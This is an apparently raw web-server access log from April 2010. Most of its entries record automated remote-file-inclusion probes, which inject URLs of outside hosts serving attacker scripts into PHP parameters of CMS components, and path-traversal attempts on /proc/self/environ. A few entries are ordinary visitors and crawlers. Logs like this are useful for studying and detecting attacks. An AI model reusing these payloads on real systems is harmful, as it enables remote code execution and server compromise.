128.210.142.81 - - [26/Apr/2010:08:44:28 -0500] "GET //playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.30.111 - - [26/Apr/2010:08:44:28 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.803"
91.121.30.111 - - [26/Apr/2010:08:44:28 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.803"
207.46.195.234 - - [26/Apr/2010:08:44:54 -0500] "GET /logs/access_log.1230422400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.15.190.163 - - [26/Apr/2010:08:45:25 -0500] "GET /logs/access_log.1262822400//playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
128.210.142.81 - - [26/Apr/2010:08:46:47 -0500] "GET /logs/access_log.1270684800%20%20//playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
128.210.142.81 - - [26/Apr/2010:08:47:17 -0500] "GET //playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
128.210.142.81 - - [26/Apr/2010:08:47:17 -0500] "GET /logs/access_log.1271030400//playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
128.210.142.81 - - [26/Apr/2010:08:47:17 -0500] "GET /logs//playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
207.46.12.110 - - [26/Apr/2010:08:50:08 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
67.201.34.227 - - [26/Apr/2010:08:50:43 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
67.195.112.180 - - [26/Apr/2010:08:51:39 -0500] "GET /logs/access_log.1181779200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.21.44.89 - - [26/Apr/2010:08:51:46 -0500] "GET /lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:51:46 -0500] "GET /logs/access_log.1219363200/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:51:46 -0500] "GET /logs/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:51:49 -0500] "GET /logs/access_log.1271030400//playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.95 - - [26/Apr/2010:08:53:24 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.217.216.132 - - [26/Apr/2010:08:54:03 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [26/Apr/2010:08:54:03 -0500] "GET /logs/access_log.1266278400/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
118.217.216.132 - - [26/Apr/2010:08:54:03 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:54:12 -0500] "GET /lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:54:12 -0500] "GET /logs/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:54:12 -0500] "GET /logs/access_log.1266451200/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:08:54:12 -0500] "GET /logs/access_log.1262476800/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:56:56 -0500] "GET /logs//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:56:56 -0500] "GET /logs/access_log.1265241600//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:56:56 -0500] "GET //common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:57:15 -0500] "GET /logs//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:57:15 -0500] "GET //common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:57:15 -0500] "GET /logs/access_log.1266451200//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.251.103.3 - - [26/Apr/2010:08:57:28 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
89.185.231.103 - - [26/Apr/2010:08:58:27 -0500] "GET /logs/access_log.1265932800//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:58:30 -0500] "GET //common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:58:30 -0500] "GET /logs/access_log.1265241600//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:58:30 -0500] "GET /logs//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
89.185.231.103 - - [26/Apr/2010:08:58:31 -0500] "GET /logs/access_log.1265932800//common/db.php?commonpath=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.217.216.132 - - [26/Apr/2010:08:59:29 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
118.217.216.132 - - [26/Apr/2010:08:59:30 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [26/Apr/2010:08:59:33 -0500] "GET /logs/access_log.1266278400/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.9.156.236 - - [26/Apr/2010:09:00:23 -0500] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.833"
125.251.103.3 - - [26/Apr/2010:09:00:28 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
125.251.103.3 - - [26/Apr/2010:09:00:49 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
207.46.13.99 - - [26/Apr/2010:09:00:55 -0500] "GET /logs/access_log.1237766400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.34.175.15 - - [26/Apr/2010:09:06:29 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
200.34.175.15 - - [26/Apr/2010:09:06:29 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.34.175.15 - - [26/Apr/2010:09:06:29 -0500] "GET /logs/access_log.1219708800//admin/spaw/spaw_control.class.php?spaw_root=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:09:07:50 -0500] "GET //common/db.php?commonpath=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:09:07:50 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:09:07:50 -0500] "GET /logs//common/db.php?commonpath=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
75.126.28.140 - - [26/Apr/2010:09:09:33 -0500] "GET /logs//include/_bot.php?master[currentskin]=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:09:09:33 -0500] "GET /logs/access_log.1262390400//include/_bot.php?master[currentskin]=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:09:09:33 -0500] "GET //include/_bot.php?master[currentskin]=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.63.227.36 - - [26/Apr/2010:09:09:56 -0500] "GET /logs/access_log.1199318400 HTTP/1.1" 404 310 "http://www.google.it/search?hl=it&source=hp&q=79.2.204.38&btnG=Cerca+con+Google&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
93.63.227.36 - - [26/Apr/2010:09:10:00 -0500] "GET /logs/access_log.1199318400 HTTP/1.1" 404 310 "http://www.google.it/search?hl=it&source=hp&q=79.2.204.38&btnG=Cerca+con+Google&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.165.81.34 - - [26/Apr/2010:09:10:32 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:09:10:32 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 200 3225 "-""Mozilla/5.0"
88.165.81.34 - - [26/Apr/2010:09:10:33 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:14:04 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:14:04 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:14:04 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.204.194 - - [26/Apr/2010:09:14:25 -0500] "GET /logs/access_log.1257206400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.170.49 - - [26/Apr/2010:09:14:25 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:14:25 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:14:25 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.122.28.5 - - [26/Apr/2010:09:16:06 -0500] "GET /logs/access_log.1212969600/http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
222.122.28.5 - - [26/Apr/2010:09:16:06 -0500] "GET /http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
222.122.28.5 - - [26/Apr/2010:09:16:07 -0500] "GET /logs/http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
72.9.156.236 - - [26/Apr/2010:09:17:11 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
87.21.44.89 - - [26/Apr/2010:09:17:23 -0500] "GET /logs/access_log.1220054400%20%20/SQuery/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.21.44.89 - - [26/Apr/2010:09:17:23 -0500] "GET /logs/access_log.1220054400/SQuery/lib/gore.php?libpath=http://77.92.94.85/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:09:21:56 -0500] "GET //classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:09:21:57 -0500] "GET /logs//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:09:21:57 -0500] "GET /logs/access_log.1268956800//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.9.156.236 - - [26/Apr/2010:09:22:34 -0500] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.833"
72.9.156.236 - - [26/Apr/2010:09:22:34 -0500] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.833"
24.187.110.83 - - [26/Apr/2010:09:22:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&ct=res&cd=10&ved=0CCQQFjAJ&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo+flash&ei=oKHVS6PIF4KB8gbt0tUH&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
24.187.110.83 - - [26/Apr/2010:09:22:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
24.187.110.83 - - [26/Apr/2010:09:22:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
24.187.110.83 - - [26/Apr/2010:09:22:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
207.46.199.38 - - [26/Apr/2010:09:26:54 -0500] "GET /logs/access_log.1224115200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.141.89.188 - - [26/Apr/2010:09:30:32 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
85.141.89.188 - - [26/Apr/2010:09:30:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
85.141.89.188 - - [26/Apr/2010:09:30:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
207.46.199.43 - - [26/Apr/2010:09:30:56 -0500] "GET /logs/access_log.1262476800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.224.16 - - [26/Apr/2010:09:33:13 -0500] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:09:33:13 -0500] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:09:33:13 -0500] "GET /logs/access_log.1225929600//components/com_mambowiki/Mam***ogin.php?IP=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.9.156.236 - - [26/Apr/2010:09:33:52 -0500] "GET /logs/access_log.1220054400/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.833"
72.9.156.236 - - [26/Apr/2010:09:33:52 -0500] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.833"
72.9.156.236 - - [26/Apr/2010:09:33:52 -0500] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.833"
75.120.58.176 - - [26/Apr/2010:09:34:33 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.831"
75.120.58.176 - - [26/Apr/2010:09:34:33 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
75.120.58.176 - - [26/Apr/2010:09:34:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.831"
75.120.58.176 - - [26/Apr/2010:09:35:14 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.831"
72.9.156.236 - - [26/Apr/2010:09:35:46 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
72.9.156.236 - - [26/Apr/2010:09:36:14 -0500] "GET /modules/mod_calendar.php?absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-""libwww-perl/5.833"
207.46.199.41 - - [26/Apr/2010:09:39:55 -0500] "GET /logs/access_log.1209168000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.42 - - [26/Apr/2010:09:40:54 -0500] "GET /logs/access_log.1252022400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.103.3 - - [26/Apr/2010:09:41:20 -0500] "GET /logs/access_log.1268956800//components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
125.251.103.3 - - [26/Apr/2010:09:41:20 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
125.251.103.3 - - [26/Apr/2010:09:41:21 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
125.251.103.3 - - [26/Apr/2010:09:41:36 -0500] "GET /logs/access_log.1219363200//components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
211.172.232.251 - - [26/Apr/2010:09:41:49 -0500] "GET /logs/access_log.1210896000//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:09:41:50 -0500] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:09:41:51 -0500] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:09:41:56 -0500] "GET /logs/access_log.1210896000//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:09:41:57 -0500] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:09:41:57 -0500] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
210.127.253.75 - - [26/Apr/2010:09:42:04 -0500] "GET /logs/access_log.1210896000//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:09:42:05 -0500] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:09:42:05 -0500] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.826"
118.129.170.49 - - [26/Apr/2010:09:43:24 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:27 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:28 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:28 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:31 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:49 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:49 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:54 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:54 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:54 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:43:54 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [26/Apr/2010:09:44:22 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.172.232.251 - - [26/Apr/2010:09:44:51 -0500] "GET /logs/access_log.1210896000//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:09:44:51 -0500] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:09:44:52 -0500] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
